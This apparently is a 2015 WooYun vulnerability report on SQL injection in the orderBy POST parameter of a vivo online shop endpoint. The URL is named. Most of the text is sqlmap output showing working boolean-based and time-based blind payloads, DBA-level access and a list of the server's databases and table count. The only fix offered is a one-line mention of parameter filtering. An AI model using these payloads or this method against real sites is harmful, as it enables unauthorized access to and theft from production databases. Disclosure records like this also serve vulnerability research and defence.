
Mobile Industry Security: SQL Injection (DBA Privileges) on a vivo Smartphone Site

2015-09-16 23:00

Code:
http://shop.vivo.com.cn/gallery-ajax_get_goods.html

POST parameters:

cat_id=&orderBy=*&scontent=n,e&showtype=grid&&virtual_cat_id=

The orderBy parameter is injectable (the * marks the injection point handed to sqlmap).





Proof of vulnerability:

Code:
sqlmap identified the following injection points with a total of 522 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
current user: '[email protected] %'
current database: 'vivo_store'
current user is DBA: True
available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] vivo04e9
[*] vivo_chk

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
Database: vivo_store
[182 tables]

Fix:

Parameter filtering

Source: www.wooyun.org/bugs/wooyun-2015-0130324
